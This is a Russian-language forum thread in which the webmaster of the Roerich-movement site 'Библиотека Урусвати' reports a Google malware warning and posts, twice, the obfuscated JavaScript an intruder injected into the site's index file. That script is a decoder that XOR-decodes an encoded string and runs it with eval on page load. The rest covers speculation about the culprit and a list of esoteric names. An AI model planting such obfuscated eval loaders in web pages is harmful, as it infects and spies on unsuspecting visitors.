Сайт "Библиотека Урусвати"

Рериховское Движение, Держава Рерихов, Живая Этика.
Ответить
Andrej
Контактная информация:

Сайт "Библиотека Урусвати"

Сообщение Andrej »

Тема отделилась отсюда:
http://lebendige-ethik.net/forum/archiv ... 1525#21525

Федор Родионов писал(а):Несмотря на может быть благие помыслы сайт на котором были размещены Дневники Е.И. - "может принести вред Вашему компьютеру", как это сказано Гуглом.
Как вебмастер сайта «Библиотека Урусвати» я заявляю, что сайт http://urusvati.agni-age.net не содержит вирусов и не может принести вред Вашему компьютеру. Я только что просмотрел FTP-аккуант сайта - он чист от посторонних файлов. Критерии Google надуманны, поэтому со временем я уберу с сайта функции поиска внутри сайта с помощью Google.
Федор Родионов писал(а): Тем не менее, этот форум и сайт несомненно приносит и пользу тоже. Несмотря на противоположные мнения об этом сайте.
В чём Вы видите пользу форума Интернет-общины? Какие противоположные мнения Вы слышали об этом форуме?
Последний раз редактировалось Andrej 18 май 2008, 10:45, всего редактировалось 2 раза.
Ziatz
Контактная информация:

Сообщение Ziatz »

Andrej писал(а):Как вебмастер сайта «Библиотека Урусвати» я заявляю, что сайт http://urusvati.agni-age.net не содержит вирусов и не может принести вред Вашему компьютеру. Я только что просмотрел FTP-аккуант сайта - он чист от посторонних файлов. Критерии Google надуманны
Я посмотрел, там какой-то непонятный скрипт. Уберите его и всё будет в порядке. У меня сайт нормально отображается и при отключённых скриптах.
Andrej
Контактная информация:

Сообщение Andrej »

Ziatz писал(а):
Andrej писал(а):Как вебмастер сайта «Библиотека Урусвати» я заявляю, что сайт http://urusvati.agni-age.net не содержит вирусов и не может принести вред Вашему компьютеру. Я только что просмотрел FTP-аккуант сайта - он чист от посторонних файлов. Критерии Google надуманны
Я посмотрел, там какой-то непонятный скрипт. Уберите его и всё будет в порядке. У меня сайт нормально отображается и при отключённых скриптах.
Да, действительно, какой-то хакер подложил в index-файл сайта http://urusvati.agni-age.net вот этот скрипт:
> <script language=JavaScript>function dwban(x){var
> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,5,22,59,17,16,50,9,60,4
> 7,
> 0,0,0,0,0,0,24,31,56,7,52,43,48,42,11,20,2,57,51,18,46,27,33,21,54,44,40
> ,19,39,4,38,30,8,0,0,0,0,25,0,6,35,26,61,62,10,12,23,32,1,15,36,0,58,53,
> 3,37,49,29,28,45,34,14,55,13,41);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=S
> tring.fromCharCode(181^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}dwban('J
> Ld
> R4EuFOctFICgFabTlrEdR5Hzb4EuombyDOC8XJAgxjpsVMXZxUAgo@psqOUyR5b@iJ2@DIhz
> rCOyvhRsFjh8bcGzDICgDja8rIkdDONyDjE_FcGTlYvkojxdXCEyFOCsVBUsFs9KrI9sDcbs
> VtezPJY@Ptnzljf@P4UulYfKqQfgx4CtxZ6TPQRyDtHsxjb@i12zrjLtR5bBq4Lur1Vyog0B
> Rc9yDhN@vc6dDCUyR59TltJ')</script><!-- agni-age.net -->

Конечно, я удалил его.
Федор Родионов

Сообщение Федор Родионов »

Andrej писал(а):Да, действительно, какой-то хакер подложил в index-файл сайта http://urusvati.agni-age.net вот этот скрипт:
Закон Моисея надо применять к подобным тварям, нарушающим межу ближнего своего:
14 Не нарушай межи ближнего твоего ...
Но при этом:
15 Недостаточно одного свидетеля против кого-либо в какой-- нибудь вине и в каком-нибудь преступлении и в каком-нибудь грехе, которым он согрешит: при словах двух свидетелей, или при словах трех свидетелей состоится [всякое] дело.
...
19 сделайте ему то, что он умышлял сделать брату своему; и так истреби зло из среды себя;
20 и прочие услышат, и убоятся, и не станут впредь делать такое зло среди тебя;
21 да не пощадит [его] глаз твой: душу за душу, глаз за глаз, зуб за зуб, руку за руку, ногу за ногу. [Какой кто сделает вред ближнему своему, тем должно отплатить ему.]

ВТОРОЗАКОНИЕ 19

И слово "тварь" это у христиан вовсе не оскорбление. Есть творец и есть тварь творцом сотворенная.
Andrej
Контактная информация:

Сообщение Andrej »

Федор Родионов писал(а):
Andrej писал(а):Да, действительно, какой-то хакер подложил в index-файл сайта http://urusvati.agni-age.net вот этот скрипт:
Закон Моисея надо применять к подобным тварям, нарушающим межу ближнего своего...
Да я бы рад вырвать дигитальный зуб у этого хакера, если бы знал как до него добраться. Мне остаётся лишь уповать на "Отмщение мне и аз воздам"...
Ziatz
Контактная информация:

Сообщение Ziatz »

А удалось выяснить, что делал этот скрипт?
Я полагаю, что отправлял личные данные всех читателей дневников в МЦР :)
Andrej
Контактная информация:

Сообщение Andrej »

Ziatz писал(а):А удалось выяснить, что делал этот скрипт?
Я полагаю, что отправлял личные данные всех читателей дневников в МЦР :)
Скрипт закодирован, поэтому невозможно сказать, какие функции он выполнял :( Но если GOOGLE идентифицировал это скрипт как потенциально опасный, то можно предположить, что этот скрипт был вражеским. А т.к. враги у Библиотеки Урусвати - это только МЦРовцы, то вполне возможно, что это их рук дело.
Andrej
Контактная информация:

Сообщение Andrej »

Спасибо друзьям за обновлённые файлы следующих книг:

"Высокий Путь", т. 1 (Word, 4022 kB)
http://urusvati.agni-age.net/Vysokij_Put_t.1.doc

"Высокий Путь", т. 2 (Word, 3769 kB)
http://urusvati.agni-age.net/Vysokij_Put_t.2.doc

"Откровение" (Word, 2692 kB)
http://urusvati.agni-age.net/Otkrovenie.doc
Федор Родионов

Andrej писал(а):
Ziatz писал(а):А удалось выяснить, что делал этот скрипт? Я полагаю, что отправлял личные данные всех читателей дневников в МЦР :)
... враги у Библиотеки Урусвати - это только МЦРовцы, то вполне возможно, что это их рук дело.
Это наиболее пагубное заблуждение, скажу я вам. Думать, что кто-то делает эти гадости из каких-то идейных побуждений. Это просто такой тип людей. Они никто. Просто получают удовольствие от причинения вреда. У них нет каких-то убеждений, так как причиняя вред таким образом - они только разрушают. И всё. И ничего больше. В одном месте они могут быть рериховцами, в другом - православными. Где-то еще - кем-то еще. Если человек тварь, то кем бы он себя не называл - он таким будет везде. По сути.

Тот, кто имеет убеждения - тот имеет и склонность к самопожертвованию и самоотверженияю хотя бы в минимальных каких-то масштабах.
Andrej
Контактная информация:

Сообщение Andrej »

Федор Родионов писал(а):Это наиболее пагубное заблуждение, скажу я вам. Думать, что кто-то делает эти гадости из каких-то идейных побуждений. Это просто такой тип людей. Они никто. Просто получают удовольствие от причинения вреда. У них нет каких-то убеждений, так как причиняя вред таким образом - они только разрушают...
Скрипт, который был внедрён на сайт, не выполнял каких-то видимых разрушительных функций и никак не отражался на внешнем виде сайта. Этот скрипт носил явно шпионско-информативный характер, что говорит о том, что люди, его внедрившие, не получали просто удовольствие от причинения вреда, как Вы это пытаетесь представить, а преследовали вполне конкретные, только им известные цели.
Andrej
Контактная информация:

Сообщение Andrej »

Добавил на сайт такое объявление:
Уважаемые читатели и посетители сайта "Библиотека Урусвати",
если у Вас возникли какие-то технические трудности в связи с посещением сайта http://urusvati.agni-age.net ,
то сообщите, пожалуйста, об этом на форум "Интернет-общины" по следующему адресу:
http://lebendige-ethik.net/forum/archiv ... php?t=1379
Федор Родионов

Andrej писал(а):
Федор Родионов писал(а):Это наиболее пагубное заблуждение, скажу я вам. Думать, что кто-то делает эти гадости из каких-то идейных побуждений. Это просто такой тип людей. Они никто. Просто получают удовольствие от причинения вреда. У них нет каких-то убеждений, так как причиняя вред таким образом - они только разрушают...
Скрипт, который был внедрён на сайт, не выполнял каких-то видимых разрушительных функций и никак не отражался на внешнем виде сайта. Этот скрипт носил явно шпионско-информативный характер, что говорит о том, что люди, его внедрившие, не получали просто удовольствие от причинения вреда, как Вы это пытаетесь представить, а преследовали вполне конкретные, только им известные цели.
Тем хуже. Причем, для движения в целом. И что, вы будете отрицать, что таким способом кто-то самоутверждается? Повышает уровень собственной значимости. Если не хватает знания в полемике можно поступить двумя способами - либо пойти читать книги, либо начать вредить. Особенно, если это является основным занятием. Сидение за компьютером. Логика проста - я не знаю, ну и вы не будет знать. А кто уже слишком много времени провел за чтением книг - пусть идет и читает дальше. В сети не принято много знать помимо обычных вещей сетевых.
Andrej
Контактная информация:

Сообщение Andrej »

Федор Родионов писал(а):Если не хватает знания в полемике можно поступить двумя способами - либо пойти читать книги, либо начать вредить. Особенно, если это является основным занятием. Сидение за компьютером. Логика проста - я не знаю, ну и вы не будет знать.
Данный скрипт не мешал сгружать дневники Е.И.Рерих и читать их.
Федор Родионов

Andrej писал(а):
Федор Родионов писал(а):Если не хватает знания в полемике можно поступить двумя способами - либо пойти читать книги, либо начать вредить. Особенно, если это является основным занятием. Сидение за компьютером. Логика проста - я не знаю, ну и вы не будет знать.
Данный скрипт не мешал сгружать дневники Е.И.Рерих и читать их.
Но потом те, кто это сделал могли уже конкретно знать, кто их именно сгружал и вирусить уже конкретный компьютер, который будет откликаться на данный вирус-шпион.

Говорю: это еще один повод для того, чтобы Рериховской движение стали обходить стороной. Пришел сюда для того, чтобы спросить: действительно ли Рерихи были последователями Маркса и Энгельса, как это сказано было в ургинской Общине? Если это так, то никакие обращения к Медведеву и Путину не помогут, так как Медведев и Путин не поддерживают марксиско-ленинскую идеологию. Что же остаётся? Остаётся делать упор на культуру - как это делал Н.К.Рерих. И вот какие проявления культуры мы видим. Нужно ввести понятие "культура общения в сети". И чтобы всякий рериховский сайт дал обявление на первой странице, что модераторы данного сайта не применяют постыдные средства для того, чтобы избавиться от неких слишком уж навязчивых посетителей. Что они, модераторы, применяют только ЗАКОННЫЕ средства: блокировку регистрации, предупреждения и т.д. И что если какие-то вирусы всё-таки человек подхватывает, то это приходит только со стороны. Это поставит, по крайней мере, всяких тварей вне закона.

У Кураева вот можно просто не найти не только регистрационного ника, но и вообще ни одного сообщения, который под ним был написан. Но и там вирусят.
Andrej
Контактная информация:

Сообщение Andrej »

Федор Родионов писал(а):
Andrej писал(а):Данный скрипт не мешал сгружать дневники Е.И.Рерих и читать их.
Но потом те, кто это сделал могли уже конкретно знать, кто их именно сгружал и вирусить уже конкретный компьютер, который будет откликаться на данный вирус-шпион.
Да, скрипты могут выдавать информацию о IP-адресах заходящих компов. Но если стоит надёжная защита, то это не страшно.
Федор Родионов

Andrej писал(а):
Федор Родионов писал(а):
Andrej писал(а):Данный скрипт не мешал сгружать дневники Е.И.Рерих и читать их.
Да, скрипты могут выдавать информацию о IP-адресах заходящих компов. Но если стоит надёжная защита, то это не страшно.
Меня в данном случае возмущает само направление мысли тех, кто это делал и делает. И то, что если бы это только была единственная попытка вредительства. Ведь нет же. Вот на форуме Кураева кто-то часто проводил сетевые атаки. А там люди, попавшие в какие-то серьёзные неприятности просят молитв, к примеру. У тех, кто приходит туда. Есть там такой раздел. Приходят и делятся своими бедами. Вот у кого-то родственник умирает, кому-то операция серьёзная предстоит или у родных опять-же болезнь. И вот, человек заходит на сайт, а сайт "висит" от перезапроса. Просто потому, что кому-то захотелось поиграться таким вот способом. Ну иди играйся на бизнес-форумы, если такой смелый. Если башку там не отвинтят - можешь гордиться собой. В большей степени. Говорю, что в нашей сфере надо изгонять такие вещи. Бороться с ними по крайней мере.

Как правило у тех, кто заходит на подобнные форумы наши - нет "надежной защиты". Особенно от каких-то продуманных попыток. К примеру от нарушение целостнсти приложений и т.д.
Andrej
Контактная информация:

Сообщение Andrej »

Перенесены некоторые посты в тему "Правда ли, что Рерихи были учениками Ленина?". Просьба к Владимиру Силантьеву и Федору Родионову соблюдать тематику веток.
Andrej
Контактная информация:

Сообщение Andrej »

Andrej писал(а):
Ziatz писал(а):
Да, действительно, какой-то хакер подложил в index-файл сайта http://urusvati.agni-age.net вот этот скрипт:
> <script language=JavaScript>function dwban(x){var
> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,5,22,59,17,16,50,9,60,4
> 7,
> 0,0,0,0,0,0,24,31,56,7,52,43,48,42,11,20,2,57,51,18,46,27,33,21,54,44,40
> ,19,39,4,38,30,8,0,0,0,0,25,0,6,35,26,61,62,10,12,23,32,1,15,36,0,58,53,
> 3,37,49,29,28,45,34,14,55,13,41);for(j=Math.ceil(l/b);j>0;j--){r='';for(
i=Math.min(l,b);i>>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=S
> tring.fromCharCode(181^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}dwban('J
> Ld
> R4EuFOctFICgFabTlrEdR5Hzb4EuombyDOC8XJAgxjpsVMXZxUAgo@psqOUyR5b@iJ2@DIhz
> rCOyvhRsFjh8bcGzDICgDja8rIkdDONyDjE_FcGTlYvkojxdXCEyFOCsVBUsFs9KrI9sDcbs
> VtezPJY@Ptnzljf@P4UulYfKqQfgx4CtxZ6TPQRyDtHsxjb@i12zrjLtR5bBq4Lur1Vyog0B
> Rc9yDhN@vc6dDCUyR59TltJ')</script><!-- agni-age.net -->

Конечно, я удалил его.
Google убрал сайт "Библиотека Урусвати" из списка опасных сайтов :)
Andrej
Контактная информация:

Сообщение Andrej »

Обновлён список эзотерических имён, псевдонимов и наименований, встречающихся в манускриптах Е.И.Рерих, который теперь выглядит так:
http://urusvati.agni-age.net/esoteric_names.html

[center]Неполный список эзотерических имён, псевдонимов и наименований,
встречающихся в манускриптах Е.И.Рерих
[/center]

[center]Список эзотерических имён[/center]

* Авирах, он же Нуця, он же Баал Шем - эзотерическое имя Мориса Моисеевича Лихтмана.
* Кай - эзотерическое имя Митусова Степана Степановича.
* Логван, он же Одомар - эзотерическое имя Луиса Леви Хорша.
* Лепети (от фр. le'petit - маленький), он же "ручной зверь" - эзотерическое имя (обращение) Шклявера Георгия Гаврииловича.
* Люмоу ("счастье, трижды позванное"), он же Хирам, он же Салим - эзотерическое имя Святослава Николаевича Рериха.
* Модра - эзотерическое имя Фрэнсис Грант.
* Морей - эзотерическое имя Завадского Василия Васильевича.
* Нару - эзотерическое имя Татьяны Денисовной, жены Гребенщикова Г.Д.
* Ояна, она же Ента, она же "свидетельница" - эзотерическое имя (обращение) Эстер Лихтман.
* Порума, она же Нейта, она же Нефрура - эзотерическое имя (обращение) Нетти Хорш.
* Радна, она же Сохрайя, она же Иеровоам - эзотерическое имя Зинаиды Григорьевны Лихтман (в девичестве Шафран, по второму браку Фосдик).
* Смотрящая, она же Видящая - эзотерическое обращение к Софье Михайловне Шафран, матери Зинаиды Григорьевны Лихтман.
* Тарухан - эзотерическое имя Гребенщикова Георгия Дмитриевича.
* Талур - эзотерическое имя Рябинина Константина Николаевича.
* Чахембула (Чахем-Була) - эзотерическое имя Кордашевского Николая Викторовича.
* Удрая, он же Тамерлан, он же Тимур, он же "пума", он же "ручной ворчун" - эзотерическое имя (обращение) Юрия Николаевича Рериха.
* Урусвати, она же Урукай - эзотерическое имя Елены Ивановны Рерих.
* Шорака ("утешение") - эзотерическое имя Джин Хорш, умершей в младенчестве, и вскоре вновь воплотившейся как Ориола Хорш, дочка Луиса и Нетти Хорш.
* Фуяма, он же Дордже, он же Акдордже - эзотерическое имя (обращение) Николая Константиновича Рериха.
* Флавий - эзотерическое имя Фрэнка Хорш, сына Луиса и Нетти Хорш.
* Яруя ("почитаю Бога"), он же Фучай - эзотерическое имя Владимира Анатольевича Шибаева.

[center]Список псевдонимов[/center]

* Епископ - Красинов - Л.Б.Красин, советский полпред в Париже.
* Тётя Ганза - Астанов - Г.А.Астахов, референт берлинского полпредства по восточным странам.
* Чемберс (Chambers) - Чиченцов - Г.В.Чичерин, нарком иностранных дел Советской России.
* Равингар - Запольский - А.Е.Быстров-Запольский, генконсул Советской России в г.Урумчи.
* Лорме - Лунов(чарский) -А.В.Луначарский, нарком просвещения Советской России.
* Крепышев - Сталин - И.В.Сталин, генеральный секретарь ЦК ВКПб Советской России.
* Заикин - Рыков - А.И.Рыков, председатель

[center]Шифровальный список имён и наименований от Е.И.Рерих
(из архива А.Е.Быстрова)
[/center]

[center]Изображение[/center]
Andrej
Контактная информация:

Сообщение Andrej »

Опубликована 22 тетрадь:
http://urusvati.agni-age.net/tetrad22_2 ... .1926.html
V.S.

Сайт "Библиотека Урусвати" заражён?

Сообщение V.S. »

Яндекс стал выдавать сообщение, что сайт «Библиотека Урусвати» может угрожать безопасности вашего компьютера.
Andrej
Контактная информация:

Re: Сайт "Библиотека Урусвати" заражён?

Сообщение Andrej »

Vladimir S. писал(а):Яндекс стал выдавать сообщение, что сайт «Библиотека Урусвати» может угрожать безопасности вашего компьютера.
Вирус давно удалён, а Яндекс не проиндексировал с тех пор сайт «Библиотека Урусвати». Я снял ограничение с google. С яндекса сниму сейчас.
Ответить